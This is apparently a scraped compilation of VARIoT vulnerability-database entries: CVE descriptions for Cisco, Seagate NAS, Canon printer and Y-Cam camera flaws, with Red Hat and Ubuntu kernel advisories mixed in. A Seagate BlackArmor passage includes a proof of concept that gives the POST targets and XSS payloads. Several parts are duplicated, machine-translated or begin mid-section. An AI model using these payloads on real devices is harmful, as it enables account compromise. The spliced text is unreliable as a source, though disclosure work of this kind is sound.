VARIoT IoT vulnerabilities database

Cisco Context Directory Agent (CDA) allows remote attackers to modify the cache via a replay attack involving crafted RADIUS accounting messages, aka Bug ID CSCuj45383. An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This issue is being tracked by Cisco Bug ID CSCuj45383. The vulnerability is caused by the program not filtering RADIUS accounting messages sufficiently. A remote attacker could exploit this vulnerability to modify the cache through a redirection attack

The Identity Firewall (IDFW) functionality in Cisco Adaptive Security Appliance (ASA) Software allows remote attackers to change the user-cache contents via a replay attack involving crafted RADIUS Change of Authorization (CoA) messages, aka Bug ID CSCuj45332. Successfully exploiting this issue will allow an attacker to perform replay attacks. This may lead to other attacks. This issue is being tracked by Cisco Bug ID CSCuj45332

Cisco Context Directory Agent (CDA) allows remote authenticated users to trigger the omission of certain user-interface data via crafted field values, aka Bug ID CSCuj45353. An attacker can exploit this issue to hide values from displaying in the CDA user interface. This may also aid in launching further attacks. Cisco Context Directory Agent (CDA) is a set of Cisco (Cisco) company running on Cisco Linux machines for real-time monitoring Active Directory Domain Controller (DC) authentication and other related events. A security vulnerability exists in Cisco CDA

The administration portal in Cisco Unified Communications Manager (Unified CM) 9.1(1) and earlier does not properly handle role restrictions, which allows remote authenticated users to bypass role-based access control via multiple visits to a forbidden portal URL, aka Bug ID CSCuj83540. This may aid in further attacks. This issue is being tracked by Cisco Bug ID CSCuj83540. This component provides a scalable, distributed and highly available enterprise IP telephony call processing solution. The vulnerability is caused by the program not properly managing role permissions

Cross-site scripting (XSS) vulnerability in the Mappings page in Cisco Context Directory Agent (CDA) allows remote attackers to inject arbitrary web script or HTML via a crafted URL, aka Bug ID CSCuj45358. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue is being tracked by Cisco Bug ID CSCuj45358

The rd_build_device_space function in drivers/target/target_core_rd.c in the Linux kernel before 3.14 does not properly initialize a certain data structure, which allows local users to obtain sensitive information from ramdisk_mcp memory by leveraging access to a SCSI initiator. Linux Kernel is prone to an information-disclosure vulnerability. An attacker can exploit this issue to obtain sensitive information; information obtained may aid in other attacks. Linux Kernel 2.6.38 through versions prior to 3.14 are affected. The NFSv4 implementation is one of the distributed file system protocols. The vulnerability is due to the fact that the program does not initialize the data structure correctly. (CVE-2014-4943) Michael S. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Important: kernel security and bug fix update Advisory ID: RHSA-2014:1971-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1971.html Issue date: 2014-12-09 CVE Names: CVE-2013-2929 CVE-2014-1739 CVE-2014-3181 CVE-2014-3182 CVE-2014-3184 CVE-2014-3185 CVE-2014-3186 CVE-2014-3631 CVE-2014-3673 CVE-2014-3687 CVE-2014-3688 CVE-2014-4027 CVE-2014-4652 CVE-2014-4654 CVE-2014-4655 CVE-2014-4656 CVE-2014-5045 CVE-2014-6410 ===================================================================== 1. Summary: Updated kernel packages that fix multiple security issues and several bugs are now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Client (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - noarch, x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64 3. Description: * A flaw was found in the way the Linux kernel's SCTP implementation handled malformed or duplicate Address Configuration Change Chunks (ASCONF). A remote attacker could use either of these flaws to crash the system. (CVE-2014-3673, CVE-2014-3687, Important) * A flaw was found in the way the Linux kernel's SCTP implementation handled the association's output queue. A remote attacker could send specially crafted packets that would cause the system to use an excessive amount of memory, leading to a denial of service. (CVE-2014-3688, Important) * Two flaws were found in the way the Apple Magic Mouse/Trackpad multi-touch driver and the Minibox PicoLCD driver handled invalid HID reports. An attacker with physical access to the system could use these flaws to crash the system or, potentially, escalate their privileges on the system. (CVE-2014-3181, CVE-2014-3186, Moderate) * A memory corruption flaw was found in the way the USB ConnectTech WhiteHEAT serial driver processed completion commands sent via USB Request Blocks buffers. An attacker with physical access to the system could use this flaw to crash the system or, potentially, escalate their privileges on the system. (CVE-2014-3185, Moderate) * A flaw was found in the way the Linux kernel's keys subsystem handled the termination condition in the associative array garbage collection functionality. A local, unprivileged user could use this flaw to crash the system. (CVE-2014-3631, Moderate) * Multiple flaws were found in the way the Linux kernel's ALSA implementation handled user controls. A local, privileged user could use either of these flaws to crash the system. (CVE-2014-4654, CVE-2014-4655, CVE-2014-4656, Moderate) * A flaw was found in the way the Linux kernel's VFS subsystem handled reference counting when performing unmount operations on symbolic links. A local, unprivileged user could use this flaw to exhaust all available memory on the system or, potentially, trigger a use-after-free error, resulting in a system crash or privilege escalation. (CVE-2014-5045, Moderate) * A flaw was found in the way the get_dumpable() function return value was interpreted in the ptrace subsystem of the Linux kernel. When 'fs.suid_dumpable' was set to 2, a local, unprivileged local user could use this flaw to bypass intended ptrace restrictions and obtain potentially sensitive information. (CVE-2013-2929, Low) * A stack overflow flaw caused by infinite recursion was found in the way the Linux kernel's UDF file system implementation processed indirect ICBs. An attacker with physical access to the system could use a specially crafted UDF image to crash the system. (CVE-2014-1739, Low) * An out-of-bounds read flaw in the Logitech Unifying receiver driver could allow an attacker with physical access to the system to crash the system or, potentially, escalate their privileges on the system. (CVE-2014-3182, Low) * Multiple out-of-bounds write flaws were found in the way the Cherry Cymotion keyboard driver, KYE/Genius device drivers, Logitech device drivers, Monterey Genius KB29E keyboard driver, Petalynx Maxter remote control driver, and Sunplus wireless desktop driver handled invalid HID reports. An attacker with physical access to the system could use either of these flaws to write data past an allocated memory buffer. (CVE-2014-3184, Low) * An information leak flaw was found in the RAM Disks Memory Copy (rd_mcp) back end driver of the iSCSI Target subsystem could allow a privileged user to leak the contents of kernel memory to an iSCSI initiator remote client. (CVE-2014-4652, Low) 4. Solution: Red Hat would like to thank Frey Alfredsson for reporting CVE-2014-3631, and Vasily Averin of Parallels for reporting CVE-2014-5045. The CVE-2014-3673 was discovered by Liu Wei of Red Hat. All kernel users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. The system must be rebooted for this update to take effect. Before applying this update, make sure all previously released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/articles/11258 To install kernel packages manually, use "rpm -ivh [package]". Do not use "rpm -Uvh" as that will remove the running kernel binaries from your system. You may use "rpm -e" to remove old kernels after determining that the new kernel functions properly on your system. 5. Bugs fixed (https://bugzilla.redhat.com/): 1028148 - CVE-2013-2929 kernel: exec/ptrace: get_dumpable() incorrect tests 1108744 - CVE-2014-4027 Kernel: target/rd: imformation leakage 1109774 - CVE-2014-1739 Kernel: drivers: media: an information leakage 1113406 - CVE-2014-4652 Kernel: ALSA: control: protect user controls against races & memory disclosure 1113445 - CVE-2014-4654 CVE-2014-4655 Kernel: ALSA: control: use-after-free in replacing user controls 1113470 - CVE-2014-4656 Kernel: ALSA: control: integer overflow in id.index & id.numid 1122472 - CVE-2014-5045 kernel: vfs: refcount issues during unmount on symlink 1140325 - CVE-2014-3631 kernel: keys: incorrect termination condition in assoc array garbage collection 1141173 - CVE-2014-3181 Kernel: HID: OOB write in magicmouse driver 1141210 - CVE-2014-3182 Kernel: HID: logitech-dj OOB array access 1141391 - CVE-2014-3184 Kernel: HID: off by one error in various _report_fixup routines 1141400 - CVE-2014-3185 Kernel: USB serial: memory corruption flaw 1141407 - CVE-2014-3186 Kernel: HID: memory corruption via OOB write 1141809 - CVE-2014-6410 kernel: udf: Avoid infinite loop when processing indirect ICBs 1147850 - CVE-2014-3673 kernel: sctp: skb_over_panic when receiving malformed ASCONF chunks 1155731 - CVE-2014-3687 kernel: net: sctp: fix panic on duplicate ASCONF chunks 1155745 - CVE-2014-3688 kernel: net: sctp: remote memory pressure from excessive queueing 6. Package List: Red Hat Enterprise Linux Client (v. 7): Source: kernel-3.10.0-123.13.1.el7.src.rpm noarch: kernel-abi-whitelists-3.10.0-123.13.1.el7.noarch.rpm x86_64: kernel-3.10.0-123.13.1.el7.x86_64.rpm kernel-debug-3.10.0-123.13.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-123.13.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-123.13.1.el7.x86_64.rpm kernel-devel-3.10.0-123.13.1.el7.x86_64.rpm kernel-headers-3.10.0-123.13.1.el7.x86_64.rpm kernel-tools-3.10.0-123.13.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-123.13.1.el7.x86_64.rpm perf-3.10.0-123.13.1.el7.x86_64.rpm perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm Red Hat Enterprise Linux Client Optional (v. 7): noarch: kernel-doc-3.10.0-123.13.1.el7.noarch.rpm x86_64: kernel-debug-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-123.13.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-123.13.1.el7.x86_64.rpm perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm python-perf-3.10.0-123.13.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm Red Hat Enterprise Linux ComputeNode (v. 7): Source: kernel-3.10.0-123.13.1.el7.src.rpm noarch: kernel-abi-whitelists-3.10.0-123.13.1.el7.noarch.rpm x86_64: kernel-3.10.0-123.13.1.el7.x86_64.rpm kernel-debug-3.10.0-123.13.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-123.13.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-123.13.1.el7.x86_64.rpm kernel-devel-3.10.0-123.13.1.el7.x86_64.rpm kernel-headers-3.10.0-123.13.1.el7.x86_64.rpm kernel-tools-3.10.0-123.13.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-123.13.1.el7.x86_64.rpm perf-3.10.0-123.13.1.el7.x86_64.rpm perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm Red Hat Enterprise Linux ComputeNode Optional (v. 7): noarch: kernel-doc-3.10.0-123.13.1.el7.noarch.rpm x86_64: kernel-debug-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-123.13.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-123.13.1.el7.x86_64.rpm perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm python-perf-3.10.0-123.13.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm Red Hat Enterprise Linux Server (v. 7): Source: kernel-3.10.0-123.13.1.el7.src.rpm noarch: kernel-abi-whitelists-3.10.0-123.13.1.el7.noarch.rpm ppc64: kernel-3.10.0-123.13.1.el7.ppc64.rpm kernel-bootwrapper-3.10.0-123.13.1.el7.ppc64.rpm kernel-debug-3.10.0-123.13.1.el7.ppc64.rpm kernel-debug-debuginfo-3.10.0-123.13.1.el7.ppc64.rpm kernel-debug-devel-3.10.0-123.13.1.el7.ppc64.rpm kernel-debuginfo-3.10.0-123.13.1.el7.ppc64.rpm kernel-debuginfo-common-ppc64-3.10.0-123.13.1.el7.ppc64.rpm kernel-devel-3.10.0-123.13.1.el7.ppc64.rpm kernel-headers-3.10.0-123.13.1.el7.ppc64.rpm kernel-tools-3.10.0-123.13.1.el7.ppc64.rpm kernel-tools-debuginfo-3.10.0-123.13.1.el7.ppc64.rpm kernel-tools-libs-3.10.0-123.13.1.el7.ppc64.rpm perf-3.10.0-123.13.1.el7.ppc64.rpm perf-debuginfo-3.10.0-123.13.1.el7.ppc64.rpm python-perf-debuginfo-3.10.0-123.13.1.el7.ppc64.rpm s390x: kernel-3.10.0-123.13.1.el7.s390x.rpm kernel-debug-3.10.0-123.13.1.el7.s390x.rpm kernel-debug-debuginfo-3.10.0-123.13.1.el7.s390x.rpm kernel-debug-devel-3.10.0-123.13.1.el7.s390x.rpm kernel-debuginfo-3.10.0-123.13.1.el7.s390x.rpm kernel-debuginfo-common-s390x-3.10.0-123.13.1.el7.s390x.rpm kernel-devel-3.10.0-123.13.1.el7.s390x.rpm kernel-headers-3.10.0-123.13.1.el7.s390x.rpm kernel-kdump-3.10.0-123.13.1.el7.s390x.rpm kernel-kdump-debuginfo-3.10.0-123.13.1.el7.s390x.rpm kernel-kdump-devel-3.10.0-123.13.1.el7.s390x.rpm perf-3.10.0-123.13.1.el7.s390x.rpm perf-debuginfo-3.10.0-123.13.1.el7.s390x.rpm python-perf-debuginfo-3.10.0-123.13.1.el7.s390x.rpm x86_64: kernel-3.10.0-123.13.1.el7.x86_64.rpm kernel-debug-3.10.0-123.13.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-123.13.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-123.13.1.el7.x86_64.rpm kernel-devel-3.10.0-123.13.1.el7.x86_64.rpm kernel-headers-3.10.0-123.13.1.el7.x86_64.rpm kernel-tools-3.10.0-123.13.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-123.13.1.el7.x86_64.rpm perf-3.10.0-123.13.1.el7.x86_64.rpm perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm Red Hat Enterprise Linux Server Optional (v. 7): noarch: kernel-doc-3.10.0-123.13.1.el7.noarch.rpm ppc64: kernel-debug-debuginfo-3.10.0-123.13.1.el7.ppc64.rpm kernel-debuginfo-3.10.0-123.13.1.el7.ppc64.rpm kernel-debuginfo-common-ppc64-3.10.0-123.13.1.el7.ppc64.rpm kernel-tools-debuginfo-3.10.0-123.13.1.el7.ppc64.rpm kernel-tools-libs-devel-3.10.0-123.13.1.el7.ppc64.rpm perf-debuginfo-3.10.0-123.13.1.el7.ppc64.rpm python-perf-3.10.0-123.13.1.el7.ppc64.rpm python-perf-debuginfo-3.10.0-123.13.1.el7.ppc64.rpm s390x: kernel-debug-debuginfo-3.10.0-123.13.1.el7.s390x.rpm kernel-debuginfo-3.10.0-123.13.1.el7.s390x.rpm kernel-debuginfo-common-s390x-3.10.0-123.13.1.el7.s390x.rpm kernel-kdump-debuginfo-3.10.0-123.13.1.el7.s390x.rpm perf-debuginfo-3.10.0-123.13.1.el7.s390x.rpm python-perf-3.10.0-123.13.1.el7.s390x.rpm python-perf-debuginfo-3.10.0-123.13.1.el7.s390x.rpm x86_64: kernel-debug-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-123.13.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-123.13.1.el7.x86_64.rpm perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm python-perf-3.10.0-123.13.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm Red Hat Enterprise Linux Workstation (v. 7): Source: kernel-3.10.0-123.13.1.el7.src.rpm noarch: kernel-abi-whitelists-3.10.0-123.13.1.el7.noarch.rpm x86_64: kernel-3.10.0-123.13.1.el7.x86_64.rpm kernel-debug-3.10.0-123.13.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-123.13.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-123.13.1.el7.x86_64.rpm kernel-devel-3.10.0-123.13.1.el7.x86_64.rpm kernel-headers-3.10.0-123.13.1.el7.x86_64.rpm kernel-tools-3.10.0-123.13.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-123.13.1.el7.x86_64.rpm perf-3.10.0-123.13.1.el7.x86_64.rpm perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm Red Hat Enterprise Linux Workstation Optional (v. 7): noarch: kernel-doc-3.10.0-123.13.1.el7.noarch.rpm x86_64: kernel-debug-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-123.13.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-123.13.1.el7.x86_64.rpm perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm python-perf-3.10.0-123.13.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/ 7. References: https://access.redhat.com/security/cve/CVE-2013-2929 https://access.redhat.com/security/cve/CVE-2014-1739 https://access.redhat.com/security/cve/CVE-2014-3181 https://access.redhat.com/security/cve/CVE-2014-3182 https://access.redhat.com/security/cve/CVE-2014-3184 https://access.redhat.com/security/cve/CVE-2014-3185 https://access.redhat.com/security/cve/CVE-2014-3186 https://access.redhat.com/security/cve/CVE-2014-3631 https://access.redhat.com/security/cve/CVE-2014-3673 https://access.redhat.com/security/cve/CVE-2014-3687 https://access.redhat.com/security/cve/CVE-2014-3688 https://access.redhat.com/security/cve/CVE-2014-4027 https://access.redhat.com/security/cve/CVE-2014-4652 https://access.redhat.com/security/cve/CVE-2014-4654 https://access.redhat.com/security/cve/CVE-2014-4655 https://access.redhat.com/security/cve/CVE-2014-4656 https://access.redhat.com/security/cve/CVE-2014-5045 https://access.redhat.com/security/cve/CVE-2014-6410 https://access.redhat.com/security/updates/classification/#important 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iD8DBQFUh2CJXlSAg2UNWIIRArzSAJ95AhqaUI998VyNBJGQaTXfSHeJuQCdFjTp 6IsJOT0XYi+TiyneMDOm9f4= =a0Ai -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Relevant releases/architectures: MRG Realtime for RHEL 6 Server v.2 - noarch, x86_64 3. (CVE-2014-3153, Important) * It was found that the Linux kernel's ptrace subsystem allowed a traced process' instruction pointer to be set to a non-canonical memory address without forcing the non-sysret code path when returning to user space. (CVE-2014-4699, Important) Note: The CVE-2014-4699 issue only affected systems using an Intel CPU. * It was found that the permission checks performed by the Linux kernel when a netlink message was received were not sufficient. (CVE-2014-0181, Moderate) * It was found that the aio_read_events_ring() function of the Linux kernel's Asynchronous I/O (AIO) subsystem did not properly sanitize the AIO ring head received from user space. (CVE-2014-0206, Moderate) * An out-of-bounds memory access flaw was found in the Netlink Attribute extension of the Berkeley Packet Filter (BPF) interpreter functionality in the Linux kernel's networking implementation. Google acknowledges Pinkie Pie as the original reporter of CVE-2014-3153. Bugs fixed (https://bugzilla.redhat.com/): 1094265 - CVE-2014-0181 kernel: net: insufficient permision checks of netlink messages 1094602 - CVE-2014-0206 kernel: aio: insufficient sanitization of head in aio_read_events_ring() 1096775 - CVE-2014-3144 CVE-2014-3145 Kernel: filter: prevent nla extensions to peek beyond the end of the message 1102571 - CVE-2014-3917 kernel: DoS with syscall auditing 1103626 - CVE-2014-3153 kernel: futex: pi futexes requeue issue 1104097 - CVE-2014-3940 Kernel: missing check during hugepage migration 1108744 - CVE-2014-4027 Kernel: target/rd: imformation leakage 1113967 - CVE-2014-4667 kernel: sctp: sk_ack_backlog wrap-around problem 1115927 - CVE-2014-4699 kernel: x86_64: ptrace: sysret to non-canonical address 6. ============================================================================ Ubuntu Security Notice USN-2337-1 September 02, 2014 linux vulnerabilities ============================================================================ A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 14.04 LTS Summary: Several security issues were fixed in the kernel. A guest OS user could exploit this flaw to cause a denial of service (host OS crash). (CVE-2014-0155) Andy Lutomirski discovered a flaw in the authorization of netlink socket operations when a socket is passed to a process of more privilege. (CVE-2014-0181) An information leak was discovered in the Linux kernels aio_read_events_ring function. (CVE-2014-4027) Sasha Levin reported an issue with the Linux kernel's shared memory subsystem when used with range notifications and hole punching. (CVE-2014-4171) Toralf F=C3=B6rster reported an error in the Linux kernels syscall auditing on 32 bit x86 platforms. (CVE-2014-4667) Vasily Averin discover a reference count flaw during attempts to umount in conjunction with a symlink. (CVE-2014-5045) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 14.04 LTS: linux-image-3.13.0-35-generic 3.13.0-35.62 linux-image-3.13.0-35-generic-lpae 3.13.0-35.62 linux-image-3.13.0-35-lowlatency 3.13.0-35.62 linux-image-3.13.0-35-powerpc-e500 3.13.0-35.62 linux-image-3.13.0-35-powerpc-e500mc 3.13.0-35.62 linux-image-3.13.0-35-powerpc-smp 3.13.0-35.62 linux-image-3.13.0-35-powerpc64-emb 3.13.0-35.62 linux-image-3.13.0-35-powerpc64-smp 3.13.0-35.62 After a standard system update you need to reboot your computer to make all the necessary changes. ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-server, linux-powerpc), a standard system upgrade will automatically perform this as well

Multiple cross-site request forgery (CSRF) vulnerabilities in the Seagate BlackArmor NAS 220 devices with firmware sg2000-2000.1331 allow remote attackers to hijack the authentication of administrators for requests that (1) add user accounts via a crafted request to admin/access_control_user_add.php; (2) modify or (3) delete user accounts; (4) perform a factory reset; (5) perform a device reboot; or (6) add, (7) modify, or (8) delete shares and volumes. The Seagate BlackArmor NAS is a network storage device. BlackArmor NAS 220 storage server is prone to the following remote security vulnerabilities: 1. Multiple cross-site request forgery vulnerabilities 2. Multiple HTML-injection vulnerabilities 3. An arbitrary code-execution vulnerability Attackers can exploit these issues to perform certain unauthorized actions, execute HTML and script code and steal cookie-based authentication credentials and execute arbitrary code. Other attacks are possible. BlackArmor NAS 220 running firmware sg2000-2000.1331 is vulnerable; other versions may also be affected. It can provide layered protection, data increment and system backup and recovery for business-critical data

Multiple cross-site scripting (XSS) vulnerabilities in Seagate BlackArmor NAS 220 devices with firmware sg2000-2000.1331 allow remote attackers to inject arbitrary web script or HTML via the (1) fullname parameter to admin/access_control_user_edit.php or (2) workname parameter to admin/network_workgroup_domain.php. The Seagate BlackArmor NAS is a network storage device. The workgroup configuration is subject to a persistent cross-site scripting attack. When a user is added to the device, the application does not properly filter the user name field data, allowing the attacker to exploit the vulnerability to inject malicious scripts or HTML code. BlackArmor NAS 220 storage server is prone to the following remote security vulnerabilities: 1. Multiple cross-site request forgery vulnerabilities 2. Multiple HTML-injection vulnerabilities 3. An arbitrary code-execution vulnerability Attackers can exploit these issues to perform certain unauthorized actions, execute HTML and script code and steal cookie-based authentication credentials and execute arbitrary code. Other attacks are possible. BlackArmor NAS 220 running firmware sg2000-2000.1331 is vulnerable; other versions may also be affected. It can provide layered protection, data increment and system backup and recovery for business-critical data. The vulnerability is caused by the admin/access_control_user_edit.php script not adequately filtering the 'fullname' parameter and the admin/network_workgroup_domain.php script not properly filtering the 'workname' parameter . # Exploit Title: Seagate BlackArmor NAS - Multiple Persistent Cross Site Scripting Vulnerabilities # Google Dork: N/A # Date: 04-01-2014 # Exploit Author: Jeroen - IT Nerdbox # Vendor Homepage: <http://www.seagate.com/> http://www.seagate.com/ # Software Link: <http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/ > http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/ # Version: sg2000-2000.1331 # Tested on: N/A # CVE : CVE-2013-6923 # ## Description: # # When adding a user to the device, it is possible to enter a full name. This input field does not # sanitize its input and it is possible to enter any payload which will get executed upon reload. The Work Group name input # field does not sanitize its input. # # This vulnerability was reported to Seagate in September 2013, they stated that this will not be fixed. # ## Proof of Concept #1: # # POST: http(s)://<url | ip>/admin/access_control_user_edit.php?id=2&lang=en # Parameters: # # index = 2 # fullname = <script>alert(1);</script> # submit = Submit # # ## Proof of Concept #2: # # POST: http(s)://<url | ip>/admin/network_workgroup_domain.php?lang=en&gi=n003 # Parameter: # # workname = "><input onmouseover=prompt(1) >

Multiple ASUS RT routers are prone to an unspecified security bypass vulnerability. Attackers can exploit this issue to bypass certain security restrictions and perform unauthorized actions on the affected application. This may aid in further attacks. ASUS RT-AC68U, RT-AC56U, RT-AC66U, RT-N66U, RT-N16 are vulnerable.

Seagate BlackArmor NAS devices with firmware sg2000-2000.1331 allow remote attackers to execute arbitrary commands via shell metacharacters in the ip parameter to backupmgt/getAlias.php. Seagate BlackArmor NAS The device firmware contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The Seagate BlackArmor NAS is a network storage device. BlackArmor NAS 220 storage server is prone to the following remote security vulnerabilities: 1. Multiple cross-site request forgery vulnerabilities 2. Multiple HTML-injection vulnerabilities 3. An arbitrary code-execution vulnerability Attackers can exploit these issues to perform certain unauthorized actions, execute HTML and script code and steal cookie-based authentication credentials and execute arbitrary code. Other attacks are possible. BlackArmor NAS 220 running firmware sg2000-2000.1331 is vulnerable; other versions may also be affected. Seagate BlackArmor NAS is a network storage server of Seagate Corporation of the United States, which can provide layered protection, data increment and system backup and recovery for business-critical data

Canon is a famous Canon printer manufacturer in Japan. An information disclosure vulnerability exists in Canon PIXMA MX722 Printer. The remote attacker is allowed to obtain the password information because the WPA2 password exposed by the device on the network is on the unprotected configuration page of the plaintext device. Canon PIXMA MX722 is prone to an information-disclosure vulnerability. Remote attackers can exploit this issue to gain access to sensitive information that may aid in further attacks. Canon PIXMA MX722 is vulnerable; other versions may also affected

Y-Cam camera models SD range YCB003, YCK003, and YCW003; S range YCB004, YCK004, YCW004; EyeBall YCEB03; Bullet VGA YCBL03 and YCBLB3; Bullet HD 720 YCBLHD5; Y-cam Classic Range YCB002, YCK002, and YCW003; and Y-cam Original Range YCB001, YCW001, running firmware 4.30 and earlier, allow remote attackers to bypass authentication and obtain sensitive information via a leading "/./" in a request to en/account/accedit.asp. plural Y-Cam There is a vulnerability in the camera firmware that prevents authentication and obtains important information.By a third party "/./" Begins with en/account/accedit.asp Through the request to, authentication may be bypassed and important information may be obtained. Y-Cam camera is a wireless network security surveillance camera system launched by Y-cam. There are information disclosure vulnerabilities in Y-Cam's various products that allow remote attackers to authenticate and obtain sensitive information through a leading \"/ /\" to en/account/acceditasp request. Multiple Y-Cam Camera Models are prone to the following security vulnerabilities: 1. A directory-traversal vulnerability 2. Multiple denial-of-service vulnerabilities 3. Multiple HTML-injection vulnerabilities An attacker can exploit these issues to perform unauthorized actions, bypass security restrictions, cause denial-of-service conditions, execute attacker-supplied HTML or JavaScript code in the context of the affected site, to steal cookie-based authentication credentials or gain access to sensitive information. Y-Cam camera models SD range YCB003 etc

Y-Cam camera models SD range YCB003, YCK003, and YCW003; S range YCB004, YCK004, YCW004; EyeBall YCEB03; Bullet VGA YCBL03 and YCBLB3; Bullet HD 720 YCBLHD5; Y-cam Classic Range YCB002, YCK002, and YCW003; and Y-cam Original Range YCB001, YCW001, running firmware 4.30 and earlier, allow remote authenticated users to cause a denial of service (reboot) via a malformed (1) path parameter to en/store_main.asp, (2) item parameter to en/account/accedit.asp, or (3) emailid parameter to en/smtpclient.asp. NOTE: this issue can be exploited without authentication by leveraging CVE-2014-1900. plural Y-Cam Camera firmware does not interfere with service operation ( reboot ) There are vulnerabilities that are put into a state.Remotely authenticated user disrupts service operation via the following malformed parameters ( reboot ) There is a possibility of being put into a state. (1) en/store_main.asp of path Parameters (2) en/account/accedit.asp of item Parameters (3) en/smtpclient.asp of emailid Parameters The problem is CVE-2014-1900 Can be exploited without authentication by exploiting the vulnerabilities in. Y-Cam camera is a wireless network security surveillance camera system launched by Y-cam. A denial of service vulnerability exists in several Y-Cam products, allowing authenticated remote users to exploit vulnerabilities and cause denial of service. Multiple Y-Cam Camera Models are prone to the following security vulnerabilities: 1. A directory-traversal vulnerability 2. 